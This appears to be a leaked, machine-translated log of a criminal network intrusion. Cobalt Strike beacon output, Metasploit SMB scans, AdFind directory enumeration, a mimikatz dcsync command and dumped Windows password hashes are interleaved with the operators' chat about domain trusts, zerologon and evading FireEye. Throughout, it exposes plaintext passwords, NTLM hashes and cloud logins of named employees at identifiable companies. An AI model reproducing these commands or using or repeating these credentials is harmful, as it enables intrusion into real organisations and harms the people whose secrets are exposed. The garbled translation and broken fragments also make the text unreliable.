192.168.0.17:5900
192.168.0.17:5800
192.168.0.17:5040
192.168.0.17:3389
192.168.0.17:139
192.168.0.17:135
192.168.0.10:139
192.168.0.10:80
192.168.0.1:139
192.168.0.1:80
192.168.0.10:445 (platform: 500 version: 6.1 name: READYSHARE domain: WORKGROUP)
192.168.0.17:445 (platform: 500 version: 10.0 name: ATSALES_RL_LAP domain: AT)
192.168.0.41:445
``````
Teemo[ATSALES_RL_LAP]rlawrence/3100|2021Jan29 20:53:18> shell systeminfo
[*] Tasked beacon to run: systeminfo
[+] host called home, sent: 41 bytes
[+] received output:

Host Name: ATSALES_RL_LAP
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19041 N/A Build 19041
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00330-50315-96784-AAOEM
Original Install Date: 11/10/2020, 7:18:46 PM
System Boot Time: 1/27/2021, 1:42:15 PM
System Manufacturer: LENOVO
System Model: 80SX
System Type: x64 based PC
Processor(s): 1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 78 Stepping 3 GenuineIntel ~1800 Mhz
BIOS Version: LENOVO 0ZCN41WW, 9/15/2017
Windows Directory: C:\WINDOWS
System Directory: C:WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-07:00) Mountain Time (US & Canada)
Total Physical Memory: 5.864 MB
Available Physical Memory: 1.787 MB
Virtual Memory: Max Size: 9,576 MB
Virtual Memory: Available: 3,440 MB
Virtual Memory: In Use: 6,136 MB
Page File Location(s): C:\pagefile.sys
Domain: AT.LOCAL
Logon Server:              \ATSALES_RL_LAP
Hotfix(s): 7 Hotfix(s) Installed.
                           [01]: KB4586876
                           [02]: KB4577266
                           [03]: KB4580325
                           [04]: KB4586864
                           [05]: KB4593175
                           [06]: KB4598481
                           [07]: KB4598242
Network Card(s): 3 NIC(s) Installed.
                           [01]: Qualcomm Atheros QCA9377 Wireless Network Adapter
                                 Connection Name: Wi-Fi
                                 DHCP Enabled: Yes
                                 DHCP Server: 192.168.0.1
                                 IP address(es)
                                 [01]: 192.168.0.17
                           [02]: Realtek PCIe GBE Family Controller
                                 Connection Name: Ethernet
                                 Status: Media disconnected
                           [03]: Bluetooth Device (Personal Area Network)
                                 Connection Name: Bluetooth Network Connection
                                 Status: Media disconnected
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
                           Virtualization Enabled In Firmware: No
                           Second Level Address Translation: Yes
                           Data Execution Prevention Available: Yes

```
most likely a laptop
Teemo[ATSALES_RL_LAP]SYSTEM */12676|2021Jan29 20:44:02> shell dir C:\Users
[*] Tasked beacon to run: dir C:\Users
[+] host called home, sent: 43 bytes
[+] received output:
 Volume in drive C is Windows
 Volume Serial Number is 2C89-5747

 Directory of C:\Users

11/10/2020 06:41 PM <DIR> .
11/10/2020 06:41 PM <DIR> .
11/10/2020 07:03 PM <DIR> administrator
11/10/2020 06:55 PM <DIR> administrator.AT
11/10/2020 06:56 PM <DIR> administrator.AT.000
11/10/2020 06:57 PM <DIR> administrator.ATSALES_RL_LAP
11/10/2020 06:54 PM <DIR> Barfield
11/10/2020 06:58 PM <DIR> LogMeInRemoteUser
11/10/2020 07:32 PM <DIR> Public
11/10/2020 06:56 PM <DIR> RLAWRENCE
11/10/2020 06:58 PM <DIR> rlawrence.AT
01/27/2021 01:44 PM <DIR> rlawrence.ATSALES_RL_LAP
               0 File(s) 0 bytes
              12 Dir(s) 847,083,728,896 bytes free

```
well the domain users go to this machineDon't you see?
Teemo[ATSALES_RL_LAP]SYSTEM */12676|2021Jan29 20:41:44> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Barfield
rlawrence
The command completed successfully.

The ``session is off again only the shortcut leading to the file I searched in uninfo did not remove because the domain was not availablebarfieldinc.com```
MS.Outlook.15:rlawrence@amgusa.org\rlawrence@amgusa.org P@ssword1
portal.us.elephantoutlook.com\rlawrence@amgusa.org P@ssword1
at\rlawrence c35845dac149d05a4fce77de6e0b5ec0
10.0.6.59\at\administrator admin@Barfield
lh_data-server\at\rlawrence P@ssword1
MS.Outlook.15:rlawrence@amgusa.org:PUT\rlawrence@amgusa.org @@CoAAAAAyBAbAEGA3BgcAUGAuBwYAUGAQYA0GAnBQdAMHAhBgLA8GAyBwZAA
MicrosoftOffice16_Data:SSPI:rlawrence@barfieldinc.com\rlawrence@amgusa.org P@ssword1
ATSALES_RL_LAP\rlawrence c35845dac149d05a4fce77de6e0b5ec0
rlawrence@amgusa.org\rlawrence@amgusa.org P@ssword1
``By the time I checked all the links, the grid fell off (my mistake, ``barfieldinc.com` their domain разокeyJhbGciOiJBKPo27yB6IVIvIi9wFeTMhPdcUc+V3inOPApoLXYnqa8LymUXCu3TSayjTQAKEHuRdM8P30shXj7gOkrV6hEbhJsvPPeJAR2UMMLK0s8FgbrHIXH/sav//HMOGzk01KZeb9Lm+lURefztW3pyHfnnipoKjYztgR2nQYs7tBiukVz3nu808H3eLJS/edbod3MK47DQ9YtJXvkftAPT9Ng/gdBrvhr/1Cax1JrrjOz2aCeEprkrMiSaJvpAC6YdJ2itxPLj5XmBnVeTEcD/6BNt84K7T77J+IjC+xgE1+a/KuDU3pXyQl9eDvTdLkcoHKZZatUTjsMq2qyUCs+FYQccBia/KZwLNn5gsYSGT1JNWPaFdD2K8oXaGSXstL8lWjZOAy54Ut0h637q9vKJTgJs1jM/KSIYzxDiuNZjgFFTauD6KqwZb2k1XJAdaKFetS2bwARuOeMM49GU0Ft9DUI/0JFZWeTJdpKTHZk6JAFQT7auCYduDiTk+kgl5gtOGpop2Y7oe0MCRa3rj0DQUu3I2Sr3J74TYBRVQP4nP0MrINVV/qbOPowpq/xrN8pOS3Ake9niHHKIM2+r713wwtA/7DHpk6lEtd6JqQH6O7ot04ioxY8xm+DwB1349Cq7NM0AFgvjxOE7jBKHj4NWUwr83LgmYSCK1zyD33xIrXO8gilNwWW755yGAWdVm5325kJ2zY43xmyEmBPHlOvtor78gSX0YyxMkbDh6dIpCypkDT3DH+2cSGPiWtwbIm5cWAFSQ57Jj+fal81kMjlPvGxqUAHnzCKNii8t5IqbZCVr51HgMivb6CfqSWbLmsbBJIx91m5aNC2I0V6nJTjRkELGiD6bG+ex1t91kk33bbRqacA6gmj2D1LZc9590bvmyPereU/K9p2YFhQGxsmEM81Jp6NpvRjhI1dZyjtnfWYHeBlgy+xcF8uxINua9DOwGHhEm5j0ZKM92b7Hg2a8H7Eo/Ksu1J83N+RxOw9oUhUt7h putting the scan``.
beacon> shell net use \\10.100.7.16\c$ 1969C00p3r /user:Administrator
[*] Tasked beacon to run: net use \\10.100.7.16\c$ 1969C00p3r /user:Administrator
[+] host called home, sent: 86 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.


beacon> shell net use \\10.100.7.16\c$ consolidate_16 /user:Administrator
[*] Tasked beacon to run: net use \\10.100.7.16\c$ consolidate_16 /user:Administrator
[+] host called home, sent: 90 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.
``Wouldn't lock)`` well try LA daaaa might try these accounts on cmb login
Administrator:1969C00p3r
Administrator:consolidate_16
Either there are other enters or the admin passwords are different and there is no overlap I removed all the current entrant domains? did it work? entrants and vmi service local admins on dc

PDC
Alias name administrators
Comment Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
DEN-DCON-01$
Domain Admins
PVRT\Enterprise Admins
PVRT\wmi.service
=============================================
``````
    DEN-DCON-02.na.panavision.com [DS] Site: Denver
    DEN-DCON-01.na.panavision.com [PDC] [DS] Site: Denver
    WDH-DCON-02.na.panavision.com [DS] Site: Woodland-Hills
The command completed successfully

=============================================

PDC
Alias name administrators
Comment Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
DEN-DCON-01$
Domain Admins
PVRT\Enterprise Admins
PVRT\wmi.service
=============================================

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
#yromero adfs.admin Administrator
BackupMgr CZambrana_da exponential
it.deploy it.inventory jharris_da
mpatterson_ea orivera_da PKooiman_da
sanadmin SP_Admin SQLAgent
windchilladmin yromero_ea
pvna\#yromero V@ndals1974


=============================================

``emmmm``.
beacon> shell ping -n 1 panavision.com
[*] Tasked beacon to run: ping -n 1 panavision.com
[+] host called home, sent: 55 bytes
[+] received output:

Pinging panavision.com [10.100.7.16] with 32 bytes of data:
Reply from 10.100.7.16: bytes=32 time<1ms TTL=126

Ping statistics for 10.100.7.16:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

``Is this the right domain?
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 10.100.7.16:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (uptime:3d 11h 49m 56s) (guid:{1466eec3-53c0-4eb4-af7e-1dabe2584051}) (authentication domain:PVRT)
[+] 10.100.7.16:445 - Host is running Windows 2016 Standard (build:14393) (name:GBL-DCON-02) (authentication domain:PVRT)
[*] 10.100.7.16: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
i have not touched it since arma did you scan through the smb version? where is this theory?)) i thought that the visibility of dns is analogous to trastan so what's the problem? it seems all seeSYD-WSUS-01
   DNS Suffix Search List ... . : ap.panavision.com
                                       na.panavision.com
                                       panavision.com
                                       eu.panavision.com
                                       sa.panavision.com

``scan now put aa here no common YES as far as I remembertry to try there the crosses YES with "that" domain find there carsnado scan on smb_version ranges all just these cars "see" domains strange some
why the fuck should the DNS give a trust? dude, i don't fucking get it
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated:2005/09/15-00:51:44 GMT Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)
>trustAttributes: 4 [Quarantined-Domain(4)]
``or a stopbrain and it's really a trusted one here''.
dn:CN=panavision.com,CN=System,DC=ap,DC=panavision,DC=com
>whenCreated: 2006/01/16-23:54:35 GMT Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

Surely they have a trusted dns, i.e. it communicates with a quarantined domain.
   DNS Suffix Search List. . . . : ap.panavision.com
                                       na.panavision.com
                                       panavision.com
                                       eu.panavision.com
                                       sa.panavision.com
``There's a subnet of the quarantined domain from EUR-DCON-01''.
Pinging panavision.com [10.100.7.16] with 32 bytes of data:

``Do you see?
beacon> shell ipconfig /all
[*] Tasked beacon to run: ipconfig /all
[+] host called home, sent: 44 bytes
[+] received output:

Windows IP Configuration

   Host Name . . . . . AUS-DCON-01.
   Primary Dns Suffix . . . . .: ap.panavision.com
   Node Type . . . . . .: Hybrid
   IP Routing Enabled . . . . .: No
   WINS Proxy Enabled. .: No
   DNS Suffix Search List. . . panavision.com
                                       na.panavision.com
                                       panavision.com
                                       eu.panavision.com
                                       sa.panavision.com

``Need''.
Host Name: EUR-WSUS-16
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00377-60000-00000-AA934
Original Install Date: 10/4/2018, 4:40:38 PM
System Boot Time: 9/12/2020, 7:25:46 PM
System Manufacturer: Microsoft Corporation
System Model: Virtual Machine
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2400 Mhz
BIOS Version: Microsoft Corporation Hyper-V UEFI Release v1.0, 11/26/2012
Windows Directory: C:\Windows
System Directory: C:{Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale: en-gb;English (United Kingdom)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 8.095 MB
Available Physical Memory: 4,448 MB
Virtual Memory: Max Size: 9.375 MB
Virtual Memory: Available: 5,468 MB
Virtual Memory: In Use: 3,907 MB
Page File Location(s): C:\pagefile.sys
Domain: eu.panavision.com
Logon Server: N/A
Hotfix(s): 18 Hotfix(s) Installed.
                           [01]: KB3192137
                           [02]: KB4091664
                           [03]: KB4132216
                           [04]: KB4465659
                           [05]: KB4485447
                           [06]: KB4498947
                           [07]: KB4503537
                           [08]: KB4509091
                           [09]: KB4512574
                           [10]: KB4520724
                           [11]: KB4521858
                           [12]: KB4524244
                           [13]: KB4540723
                           [14]: KB4550994
                           [15]: KB4562561
                           [16]: KB4565912
                           [17]: KB4576750
                           [18]: KB4577015
Network Card(s): 1 NIC(s) Installed.
                           [01]: Microsoft Hyper-V Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled: Yes
                                 DHCP Server: 10.32.1.41
                                 IP address(es)
                                 [01]: 192.168.33.101
                                 [02]: fe80::f831:9a12:366d:1ed6
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

``and in
ipiconfigure the entire output of the systeminfo
                           [01]: Microsoft Hyper-V Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled: Yes
                                 DHCP Server: 10.32.1.41
                                 IP address(es)
                                 [01]: 192.168.33.101
                                 [02]: fe80::f831:9a12:366d:1ed6

``````
                           [01]: Microsoft Hyper-V Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 192.168.1.85
                                 [02]: fe80::188e:a234:ce85:3eb7

If you want I can give you access yourself poke but the fun is that its own load is defined as a malware))) in general, the essence of it is that it bypasses the amsi and allows through itself to run modules like mimic and how he incidentally? just in sisteminfo glance rolled up that porahabka how else to remove dns I hunk) and I therefore told you that the folder dns no and how utilities) where there is no dns server?)))) do not remove dns records logically you know so you said to remove the dns I only know about it) anddvisit who logged into the server (if there are from other domains who was - will be visible) and see what they will dns damn) dosysteminfo what are you trying to dump?) it's not dns servers What the fuck are you doing? what now do? folder DNS is nowhere, dnscmd also found no in system32 ``
beacon> shell dnscmd /enumzones > AllZones.txt
[*] Tasked beacon to run: dnscmd /enumzones > AllZones.txt
[+] host called home, sent: 63 bytes
[+] received output:
'dnscmd' is not recognized as an internal or external command,
operable program or batch file.

``````
beacon> shell dir C:\windows\system32\dns
[*] Tasked beacon to run: dir C:\windows\system32\dns
[+] host called home, sent: 58 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 5C94-6AB3

 Directory of C:\windows\system32

File Not Found

Well, if it goes down through services, you can do it in bulk with a batman, but you have to turn it off on every PC as you understand it and it goes off through services...you have to find a firewall...``
Pinging EUR-WSUS-16.eu.panavision.com [192.168.33.101] with 32 bytes of data:
Reply from 192.168.33.101: bytes=32 time=157ms TTL=251

Ping statistics for 192.168.33.101:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 157ms, Maximum = 157ms, Average = 157ms



Pinging SYD-WSUS-01.ap.panavision.com [192.168.1.85] with 32 bytes of data:
Reply from 192.168.1.85: bytes=32 time=204ms TTL=251

Ping statistics for 192.168.1.85:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 204ms, Maximum = 204ms, Average = 204ms

``Even so, another wuss is alive.

Pinging AUB-WSUS-16.eu.panavision.com [172.16.1.120] with 32 bytes of data:
Reply from 66.45.62.99: Destination net unreachable.

Ping statistics for 172.16.1.120:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

[+] received output:

Pinging EUR-WSUS-16.eu.panavision.com [192.168.33.101] with 32 bytes of data:
Reply from 192.168.33.101: bytes=32 time=157ms TTL=251

Ping statistics for 192.168.33.101:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 157ms, Maximum = 157ms, Average = 157ms

``````
The genuine xagt.exe file is a software component of FireEye Endpoint Security by FireEye.
FireEye Endpoint Security is a single-agent security solution that protects endpoint systems from online threats. Xagt.exe runs a core process associated with FireEye Endpoint Security. Disabling this process may cause issues with this program
``If my English was worse than 0, I'd translate it as burning ass[ ](https://mediaeveryone.com/group/panavision-com?msg=ChvqBYADCYspYbbPi) so fire eye is a thing``.
> Sage

AUB-SAGE-16
``by the way``
what's up with the avera on the net? let's see what's on it ahahahahah) ahahahahahahaha working
Pinging SYD-WSUS-01.ap.panavision.com [192.168.1.85] with 32 bytes of data:
Reply from 192.168.1.85: bytes=32 time=204ms TTL=251

Ping statistics for 192.168.1.85:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 204ms, Maximum = 204ms, Average = 204ms

``to
I wonder if there is no more WSUS except the one that doesn't exist ``that's WSUS''.
beacon> shell ping -n 1 SYD-WSUS-01
[*] Tasked beacon to run: ping -n 1 SYD-WSUS-01
``There is hope)1 for 4 domains...so maybe it's under a different name``.
beacon> shell ping -n 1 DEN-SCCM-01
[*] Tasked beacon to run: ping -n 1 DEN-SCCM-01
beacon> shell ping -n 1 DEN-WSUS-01
[*] Tasked beacon to run: ping -n 1 DEN-WSUS-01
[+] host called home, sent: 104 bytes
[+] received output:
Ping request could not find host DEN-SCCM-01. Please check the name and try again.

[+] received output:
Ping request could not find host DEN-WSUS-01. Please check the name and try again.

``````
dn:CN=DEN-WSUS-01,OU=Disabled Computers,DC=na,DC=panavision,DC=com
dn:CN=DEN-SCCM-01,OU=Disabled Servers,DC=na,DC=panavision,DC=com
``This is just signed as WSUSwho? WSUS server? can it somehow stand out from the ad comps? lol) okvernotipo 1 server can be one WSUS for multiple domains? including quarantineSSM / WSUS servers often under different hostnames are present in all forest domains yes so WSUS will be a trusted server as it sees the DNS server quarantine?not sure how? can they see quarantine from all current domains? no idea how?
have to look for an input...no problem
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated:2005/09/14-16:51:44 Pacific Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)
>trustAttributes: 4 [Quarantined-Domain(4)]
What's the name of the quarantined domain again?
eu.panavision.com
=================



> Domain Controller

AUB-DCON-01
PRK-DCON-01
PRK-DCON-02
GFD-DCON-01
GFD-DCON-02
EUR-DCON-01
GFD-DCON-16

--------------------

> File Servers

PRA-FILE-01
PRK-FILE-01
AUB-FILE-01
AUB-FILE-02
GFD-FILE-01
AUB-FILE-04
FR-SPARESERVER
MAN-FILE-02
PRV-FILE-02
WTL-FILE-02

--------------------

> Sage

AUB-SAGE-16

--------------------

> SQL

PA-SDS-01
EUR-DOMS-01
EUR-ACMS-01
EUR-MSQL-14
AUB-WEB-01
GFD-ACMS-02
PA-INTB-01
PRK-ITMS-01

--------------------

> UAG Server

EUR-FUAG-01

--------------------

> Insphire Server

EUR-INSP-01

--------------------

> Hyper-V

AUB-HYPV-01
AUB-HYPV-01
AUB-HYPV-02
GFD-HYPV-05
GFD-HYPV-06
AUB-HYPV-04
PRK-HYPV-03

--------------------

> Remote Desktop Services Server/Credit Host

EUR-RDS-04
EUR-RDSH-08
EUR-MRDS-01
EUR-RDSB-01
EUR-RDSH-01
EUR-RDSH-02
EUR-RDSH-03
EUR-RDSH-04
EUR-RDSH-05
EUR-RDSB-02
EUR-RDSB-03
EUR-RDSH-06
EUR-RDSH-07

--------------------

> Interbase Database Server

GBL-INTR-01
GBL-INTR-02

--------------------

> WSUS

AUB-WSUS-16
EUR-WSUS-16

--------------------

> Terminal Server License Servers

EUR-LHPV-01
EUR-LHPV-02
EUR-LHPV-03

--------------------

> ATS Server

PA-PRTSVR

--------------------

> Disabled Computers

PRK-SRCE-01
PRK-BUILD-01
PRK-CBLD-01
PRK-CSYS-01
PRK-CVCS-01
PRK-HPV-01
EUR-LRAH-01
EUR-LRAH-02
EUR-DCON-02

--------------------

> Failover cluster virtual network name account

PRK-CLST-12
GDF-CLST-01

--------------------

> Lexicon
(Web Hosting, eCommerce Solutions, Peace of Mind. LexiConn provides personal service, expert, in-house support, and rock solid hosting solutions designed to grow and evolve with the needs of your business)

EUR-LRAH-03
EUR-LRCB-01
EUR-LRAH-04
EUR-LRAH-05

--------------------

> Unavailable

EUR-LEE-01
EUR-LEE-02
EUR-LEE-03
EUR-LEE-04
EUR-MDPM-01
GFD-CORESRV-01

--------------------

> w3wp

EUR-LREP-01
EUR-LSRV-02
EUR-LSRV-06
EUR-LSRV-07
EUR-LSRV-08
EUR-LSRV-09

--------------------

> PDQ

EUR-ITMS-12


--------------------

???

AT-SRV-APPS-1
EUR-CSYS-01
EUR-CVCS-01
GFD-ALCT-01
ask colleagues, there on my pce found? and it is only checker found checker, but it checks only 1 ip per time, I have not checked) smbgost past?
my last hope is zerologon (which didn't get patched after the last attempt lol)
to remove the dcsync you have to do the token via pth but since there is no system - no way
```
mimikatz lsadump::dcsync /dc:SS-Data2.Austin.SilencerShop.com /user:SilencerShop\krbtgt /authuser:SS-DATA2$ /authdomain:. /authpassword:"" /authntlm
```
this line doesn't seem to work because CS has an old mimic
and the new version on the machine can not level because it sees as a virus.we only have one valid user who walks on cmb at 10.7.20.30 - and who knows what kind of machine (he is a local user there) if you removed the ad_users.txt I understand that you have logins)) only logins found YES without passwords found = login and password are validLogin YES we can not get into the domain found (found their logins) Ie all right, while looking for YESConnected to the vpnTax you are not connected to the vpn?behind a local) or what network do you walk around on? checked the local admins, accounts YES to the passwords found> raised vpn, through our dedication walk around the network
i am reading this phrase wrong? found the domain not connectedDid you find any passwords on smb admin> raised vpn, through our dedic, walk the network, see what's there, scan for ms17 how's it going?
[+] 10.7.20.30:445 - 10.7.20.30:445 - Success: 'WORKSTATION\Louisad:M@tches2020!

``description
```
 Prod App read only (Matches2014) - prodappread
 Test account for app pw matches123 - ipadvpn
 iTunes Account for Richmond stores (Matches123) - richapp
``DA''.
LDAP_SEARCH_S: 0x34
LDAP_SEARCH_S: Unavailable

ERROR: Couldn't gather RootDSE Info...
Terminating program.

``````
adfind.exe -f "(objectcategory=person)" -h 10.1.4.30 > ad_users.txt
adfind.exe -f "objectcategory=computer" -h 10.1.4.30 > ad_computers.txt
adfind.exe -f "(objectcategory=organizationalUnit)" -h 10.1.4.30 > ad_ous.txt
adfind.exe -subnets -f (objectCategory=subnet) -h 10.1.4.30 > subnets.txt
adfind.exe -f "(objectcategory=group)" -h 10.1.4.30 > ad_group.txt
adfind.exe -gcb -sc trustdmp -h 10.1.4.30 > trustdmp.txt
``This does not exist in the domain and you are trying to make queries to the DC from a forbidden pk. The reason is that you cannot remove the AD because your pk is in a vorkgroupdid you raise the vpn there?
 Directory of C:\users\Administrator\Desktop

09/28/2020 03:23 PM <DIR> .
09/28/2020 03:23 PM <DIR> .
09/28/2020 03:24 PM 391 ad.bat
09/28/2020 03:22 PM 1,394,176 adFind.exe
09/28/2020 01:55 PM 4,554 io.xml
09/23/2020 12:33 PM 303,098 kali-linux-2020.3-installer-amd64.iso.torrent
09/28/2020 02:55 PM 27 LEHA.txt
09/28/2020 01:55 PM 0 New Text Document.txt
09/28/2020 02:12 PM 935 Nmap - Zenmap GUI.lnk
09/28/2020 02:21 PM 7,978 nmap.7z
09/28/2020 02:19 PM 188,255 nmap.xml
09/23/2020 12:32 PM 867 µTorrent.lnk

``Try restarting@tl1 what could it be?``in smb_login
 Error: 10.20.4.78: Errno::EISDIR Is a directory @ io_fillbuf - fd:52 /home/user/Desktop/cobalt

``[ ](https://mediaeveryone.com/group/matches?msg=bsWTgZB5hY8rthErT) no, but it doesn't find it
====== MappedDrives ======

Mapped Drives (via WMI)

  LocalName : p:
  RemoteName : \ho-fs01.matches.com\press
  RemotePath : \\ho-fs01.matches.com\press
  Status : Unavailable
  ConnectionState : Disconnected
  Persistent : True
  UserName :
  Description : RESOURCE REMEMBERED - Microsoft Windows Network

  LocalName : y:
  RemoteName : \\HO-FS01.matches.com\department
  RemotePath : \\HO-FS01.matches.com\department
  Status : Unavailable
  ConnectionState : Disconnected
  Persistent : True
  UserName :
  Description : RESOURCE REMEMBERED - Microsoft Windows Network
Isn't it empty?
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:faf5481720d381d2405ef4194ddb4770:::

DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1a20cb05b4b6db77e592dee4e974e4d9:::
``````
Domain : UKHECSLT3028
Login : Administrator
Password : 192837465S!
NTLM : f490c4823837a7d002e0176f3c5203ad


Domain : MATCHES
Login : mercedesd
Password : Dinham2323
NTLM : 7c839aa54221edb65e959f18ab9bde41


Domain : MATCHES.COM
Username : Louisad
Password : M@tches2020!
NTLM : f74bc7faf8ddfbedb1441e9e42cdbb1c
Nice:+ is the VPN up? it's ok if you want to connect his pc he may notice that the VPN is up maybe the installer is on the pc look for the domain to connect, domain-creds you have Deploy the VPN on the harddisk
beacon> shell ipconfig /all
[*] Tasked beacon to run: ipconfig /all
[+] host called home, sent: 44 bytes
[+] received output:

Windows IP Configuration

   Host Name . . . . . . ♪ UKHOEVLT3156 ♪
   Primary Dns Suffix . . . . ♪ matches.com ♪
   Node Type ... ... . .: Mixed.
   IP Routing Enabled . . . . ♪ No ♪
   WINS Proxy Enabled . .: No
   DNS Suffix Search List. . matches.com
                                       Home

Ethernet adapter Ethernet 3:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . ♪ Fortinet SSL VPN Virtual Ethernet Adapter ♪
   Physical Address. . . . 00-09-0F-AA-00-01.
   DHCP Enabled . . . . ♪ Yes ♪
   Autoconfiguration Enabled . .: Yes

Ethernet adapter Ethernet:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix . : matches.com
   Description . . . . . : Intel(R) Ethernet Connection (6) I219-V
   Physical Address . . . . .: 00-68-EB-67-1A-A2
   DHCP Enabled. . . . ♪ Yes ♪
   Autoconfiguration Enabled . .: Yes

Wireless LAN adapter Local Area Connection* 1:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . ♪ Microsoft Wi-Fi Direct Virtual Adapter ♪
   Physical Address . . . . : 04-ED-33-E4-5F-2B.
   DHCP Enabled. . . . .: Yes
   Autoconfiguration Enabled . .: Yes

Wireless LAN adapter Local Area Connection* 10:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . . ♪ Microsoft Wi-Fi Direct Virtual Adapter #2 ♪
   Physical Address . . . . ♪ 06-ED-33-E4-5F-2A ♪
   DHCP Enabled. . . . .: Yes
   Autoconfiguration Enabled . .: Yes

Ethernet adapter Ethernet 2:

   Media state ... ... ... ♪ Media disconnected ♪
   Connection-specific DNS Suffix :
   Description . . . . . . .: Fortinet Virtual Ethernet Adapter (NDIS 6.30) .
   Physical Address . . . . .: 00-09-0F-FE-00-01
   DHCP Enabled . . . . Yes
   Autoconfiguration Enabled . .: Yes

Wireless LAN adapter WiFi:

   Connection-specific DNS Suffix ... : Home
   Description . . . . . : Intel(R) Wi-Fi 6 AX200 160MHz
   Physical Address . . . . : 04-ED-33-E4-5F-2A.
   DHCP Enabled. . . . .: Yes
   Autoconfiguration Enabled. .: Yes
   IPv6 Address. . . . : 2a02:c7d:a28:5100:7de6:b515:bbeb:89c0(Preferred)
   IPv6 Address. . . . : fdb0:64:3df8:0:7de6:b515:bbeb:89c0(Preferred)
   Temporary IPv6 Address. . . . : 2a02:c7d:a28:5100:5ce0:5b5c:1236:fc08(Preferred)
   Temporary IPv6 Address. . . .: fdb0:64:3df8:0:a9ec:ba3a:d314:b55e(Preferred)
   Link-local IPv6 Address . . . : fe80::7de6:b515:bbeb:89c0%11(Preferred)
   IPv4 Address . . . . .: 192.168.0.80(Preferred)
   Subnet Mask . . . : 255.255.255.0
   Lease Obtained... on... ♪ Sunday, September 27, 2020 12:33:55 PM ♪
   Lease Expires . . . . . : Tuesday, September 29, 2020 9:42:09 AM
   Default Gateway . . . . ♪ fe80::7e4c:a5ff:fef9:c2a0%11
                                       192.168.0.1
   DHCP Server . . . . : 192.168.0.1
   DHCPv6 IAID . . . . : 201649459
   DHCPv6 Client DUID . . . . : 00-01-00-01-25-72-B4-85-00-68-EB-67-1A-A2
   DNS Servers . . . . . : fdb0:64:3df8:0:7e4c:a5ff:fef9:c2a0
                                       192.168.0.1
   NetBIOS over Tcpip. . . . .: Enabled

````UKHOEVLT3156\Administrator faf5481720d381d2405ef4194ddb4770``MATCHES.COM\Louisad M@tches2020!!`!
URL : https://login.microsoftonline.com/common/login
Username : louisa.davies@matchesfashion.com
Password : Basil1234
```
